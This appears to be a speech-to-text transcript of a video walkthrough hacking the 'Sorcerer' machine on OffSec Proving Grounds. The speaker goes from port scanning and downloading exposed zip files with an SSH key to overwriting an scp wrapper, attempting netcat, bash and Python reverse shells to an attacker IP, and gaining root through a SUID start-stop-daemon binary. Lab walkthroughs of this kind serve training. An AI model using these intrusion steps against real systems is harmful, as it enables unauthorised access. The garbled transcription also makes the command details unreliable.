Hi everyone, welcome to my channel. I hope that you hear me right. I'm going to review the connection. So it seems that it's right. Yeah. So um, we are going in this video to perform a penetration test over sorcerer machine is intermediate level, the proving grounds of offensive security. So this is the IP, the machine is ready, and we start to perform the attack. So the first step is perform a recognition of the open expose ports and the version with common scripts with nmap. um, I showed you the script in previous videos, so we are going to review with a fast scanner TCP developed at Go the open ports on the target service. um, yeah, it seems that at least the 18 port is open, close multiple other tabs at port 80, so it's a not found. So let me review, for example, with dear buster at this IP. So is this like it too many errors connecting to host because I copy the complete path of URL. So it's working at this point. During the fusing process, we are going to review the open ports. This is SSH. It's a new version. It's don't seems that it has vulnerabilities. The 18 port RPC bind with among the service. So NFS open another HTTP and another HTTP. So we are going to filter target and map with open ports, no log manager. So it's something to review. So at this time we have another two servers open. At the board, this is engines 7742. This is 7742. This is 7742. It's a control panel. Control U. So enter script if login invalid login. This is a fake login. So because don't have a form and the on click button only show invalid login. So this is something not important. So we are going to push to this WD and USR share word list. word list, seg list, discovery, web common.txt, and final the first at the first attempt at 18 port we don't found nothing. This is the not found, so the last one is 8080, so maybe this web has the content 8080. So this is a Tomcat. Voila la. Application manager, script, web manager, how to, but it seems that the login is disabled, so Tomcat 7.0.4 we can review with search exploit the Tomcat 7 dot 0 ordered by cross-site scripting Linux remote GPS upload bypass. So let me check this one. Search exploit minus m, this one. So beam, let me check before. Python 42 minus u, this one at port 8080, not vulnerable to this exploit, so maybe it's the manager HTML, this one, not vulnerable, so we don't going to use this 42 directory, but we can try to fuse this one. So DB this one minus wd user share word list, sec list, discovery, web content, and common.txt. So to the 18 port we can launch another one with common extensions, the HTML or .php or HTML, PHP or TXT. Yeah. Zip files. Voila, what is this? So it seems that in this directory, the copy link, we can go to data, perfect, and we can cool minus b this one. So we can try to download copy link francis.zip. The next one is max.zip. The next one is mariam.zip and sofia.zip. mariam.zip. Yep, Maria. Miriam, sorry. Miriam.zip and Sophia.zip. So there are the zips: unzip, Sophia.zip. Okay, unzip Miriam.zip, unzip max.zip. Oh, this one contains cd home. Home, and inside of max we can find the first one is cat Tomcat users XML. So this is the user and credentials of the Tomcat login, but it seems that the login is disabled and we can try to access in order to deploy some malicious word. But it has a SCP wrapper sh script that shows you some switch case about the input original command, and the other one is the most important content that I review here is SSH. Yeah, so it contains the authorized case. It contains the ID RSA private key. So we can try to do this one: -e ID RSA. Max is the user. At the IP of the target machine, that is 192, 168, 174 and 100. Yeah, yes, and it say permissions are to open. So hitch mode 600 to ID RSA. So at this point we can access and say access denied, usage SCP. It seems that the previous script, so cat cp is enabled, so we can export yeah, who am I, this is the initial command, so we can execute scp wrapper ssh. So, and the response is the same, so maybe we can use scp who am I? And don't say nothing. Echo use or ID no such file or directory. So if we try to connect and execute a command at the init, for example, who am I? The response is so this is inside of .ssh. Yes, usage access deny. So we can use scp -e to modify the scp wrapper sh at the scp at this one. So scp wrapper, yeah. So sorry, we need include .ssh here. This is 174 and 10 and 100. Yeah, is copy successful. So if we bin scp wrapper sh and here instead of access deny access modify, so we can perform who am I and copy it again. Perfect. So we can try to connect and review the output. Who am I command not found. Access modify. So maybe we can x ID this is the ID of the user. Perfect. So at this point we can, for example, execute netcat -e bin was to my attacker IP that is sorry, here is ifconfig at port, for example, 80. So it seems that it's going to provide to us a new reversal at port in LVP80. Yes. So we need upload it Right now, try to execute netcat command not found. So sorcerer vin netcat, yeah, maybe like this. P. User vin netcat, maybe like this. Perform the connection again. No such file or directory. Okay. No problem, because we can do this one. Echo inject your command here. We can upload it again. Right now we can do this one. So beam append $SSH original command. Yes, we can upload it. Command, yes, it seems that is right. Right now so instead of who am I, can perform ID. Yeah. Why not? We can try to perform a reversal, for example with bash. Bash reverse cell, one line, for example. Yeah, pentest monkey payload all the things. Yeah, this one could be nice, but here should be my attacker IP 49,174. Yeah, at port 80. This is all. Bash not found. So vin bash, maybe dislike this one. So maybe with Python minus version. Yeah, it could be work. Minute C. So with Python we can try to do it at the port 80, and the IP is this one. So it's here. Yeah, work at local so we can close it. Then we can create a vin cell.sh, copy this one, put it inside, provide its smooth execution privilege to the cell.sh, yeah, and try it again for an script. Perfect. So the script worked fine. So we only need with HTTP upload the shell script that is here, data at map cell.sh to the home of Max. So right now we can review that the shell has permission for execution. We are already shell.sh. Yeah, perfect. So who am I? Max ID Max. So at this point we can perform beam bus, no, exit. So import python -c, import pte, so pte dot spawn bin was, close it and close it. Yes, sorcerer. pwd is the max user. Inside of Dennis, for example, that not expose it zip is the local flag. Perfect. So we have the first flag of the intrusion. So at this point we are ready to locate this script. We can cp this one to script folder and go to script folder, and upload a python 3 -m http server at port, for example, 4343. So from the machine side we can obtain the data if config invoking to the attacker machine at port 443 at lse.sh. Perfect. Obtain the reverse the data. So we need provide privilege to the sh file. Right now we can execute it -l1. Yep. In order to review the target system. So let me check the output, review the values. Okay, root is the user that we want to be. This is the other open users. The binaries are here. This is path variable. Binaries with set UID bit. So uncommon set UID byte binaries. So this could be interesting. We can review, for example, GTF O beans, and looking for this binary. This binary is start stop daemon. Perfect. Has a function of UID, so it let us spawn a new cell with this binary. So let me copy all because it's in the path. So it's easy. We can review this one here. This is user bin start stop daemon, start stop daemon. It seems that it not exists at this path, so I don't remember the path name at sbin. So perfect. Yes, it contains the set UID byte, so perfect. We can do this one, copy this, perform this one. So who am I? Root ID, root, host name, sorcerer, the root folder. We can obtain the proof.txt that is our second flag. The machine was hacked. Yep. So this is all for this machine. I see you on the next videos.